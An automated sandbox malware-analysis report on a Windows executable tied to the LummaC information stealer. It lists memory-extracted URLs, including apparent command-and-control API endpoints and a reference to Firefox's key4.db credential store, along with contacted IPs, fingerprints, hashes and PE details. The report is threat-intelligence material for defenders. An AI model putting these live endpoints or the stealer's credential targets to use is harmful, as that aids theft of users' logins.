                                                                                                  https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://sergei-esenin.com:443/apifile.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      		unknown
                                                                                                      https://sergei-esenin.com/kfile.exe, 00000000.00000003.1850629516.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851091044.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1853087164.00000000012DF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                        		unknown
                                                                                                        https://support.microsoffile.exe, 00000000.00000003.1718877156.0000000005C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://www.google.com/recaptcha/file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://checkout.steampowered.com/file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://sergei-esenin.com:443/api6file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                		unknown
                                                                                                                https://store.steampowered.com/;file.exe, 00000000.00000003.1690568055.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&amp;l=englfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://store.steampowered.com/about/file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&amp;l=file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://help.steampowered.com/en/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://steamcommunity.com/market/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://store.steampowered.com/news/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&amp;l=englishfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://steamcommunity.com/profiles/76561199724331900&file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1718877156.0000000005C3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=r7a4-LYcQOjfile.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://dissapoiznw.store:443/apifile.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://sergei-esenin.com/apiwzfile.exe, 00000000.00000003.1851345687.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1858209085.0000000005BDD000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                      		unknown
                                                                                                                                      https://store.steampowered.com/stats/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://sergei-esenin.com:443/api4p.default-release/key4.dbPKfile.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                        		unknown
                                                                                                                                        https://medal.tvfile.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://x1.c.lencr.org/0file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://x1.i.lencr.org/0file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&amp;l=englishfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a61file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://sergei-esenin.com/apiHv$file.exe, 00000000.00000003.1700659896.0000000001248000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                    		unknown
                                                                                                                                                    https://community.steamstatic.com/file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://community.steamstatic.com/public/css/applications/community/main.css?v=DVae4t4RZiHA&amp;l=enfile.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://clearancek.site:443/apifile.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://login.steampowered.com/file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown

                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public IPs

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            104.21.53.8
                                                                                                                                                            		sergei-esenin.comUnited States
                                                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                                                            104.102.49.254
                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                            		16625AKAMAI-ASUStrue

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                            Analysis ID:1538068
                                                                                                                                                            Start date and time:2024-10-20 08:38:08 +02:00
                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 5m 14s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                            Number of analysed new started processes analysed:6
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Sample name:file.exe
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@10/2
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                            Warnings

                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                            • Execution Graph export aborted for target file.exe, PID 7436 because there are no executed function
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            02:38:58API Interceptor11x Sleep call for process: file.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            104.21.53.8cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                  PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      FwJnQcLliE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            SecuriteInfo.com.Win32.Evo-gen.11702.30674.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              SecuriteInfo.com.Win64.Malware-gen.32137.30234.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                                104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • www.valvesoftware.com/legal.htm

                                                                                                                                                                                Domains

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 172.67.206.204
                                                                                                                                                                                cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 172.67.206.204
                                                                                                                                                                                EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 172.67.206.204
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 172.67.206.204
                                                                                                                                                                                S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                FwJnQcLliE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                steamcommunity.comaZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254

                                                                                                                                                                                ASNs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 172.67.206.204
                                                                                                                                                                                cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 172.67.206.204
                                                                                                                                                                                EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 172.67.206.204
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 172.67.206.204
                                                                                                                                                                                S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                FwJnQcLliE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                AKAMAI-ASUSaZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.102.49.254

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                2WWOAq4c3b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                EY2raBetTi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                PTc16LnPI5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                yRMHuXP8fH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                • 104.21.53.8
                                                                                                                                                                                • 104.102.49.254

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                No created / dropped files found

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Entropy (8bit):6.4914421253430215
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                File size:3'058'688 bytes
                                                                                                                                                                                MD5:ae7fda647df94fb9207204a517856151
                                                                                                                                                                                SHA1:57e738f83c355c72b9d48e0b120a27c40889c38e
                                                                                                                                                                                SHA256:7da052a541128f2cdacb400d37b765039cac8b4e293fc53a88ac721c144950c9
                                                                                                                                                                                SHA512:2322a8dad5b877cc395d30bc62220b3ec07fdc06a3e3db8259dab2b5d2c295614bd9e0eb4024ca965ea026f1681e6c46a74ade1f4a53bc2a6c54a8275995181d
                                                                                                                                                                                SSDEEP:49152:x6/bIcXnLK66wyhxMG+OabqF4hI0hLIAqVh63ZQ46s2I:x6/UcXDyhxMG+OabqF4hI0hLI1VhYZQi
                                                                                                                                                                                TLSH:3AE55CA1B90A72CFC48F1678942BCF86599D43B9471408C798ACF47ABDA3DC135F6C29
                                                                                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................02...........@..........................`2......g/...@.................................W...k..

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x723000
                                                                                                                                                                                Entrypoint Section:.taggant
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                jmp 00007F377C6A169Ah
                                                                                                                                                                                jp 00007F377C6A16C4h
                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                jmp 00007F377C6A3695h
                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                or al, byte ptr [eax]
                                                                                                                                                                                add byte ptr [eax], al
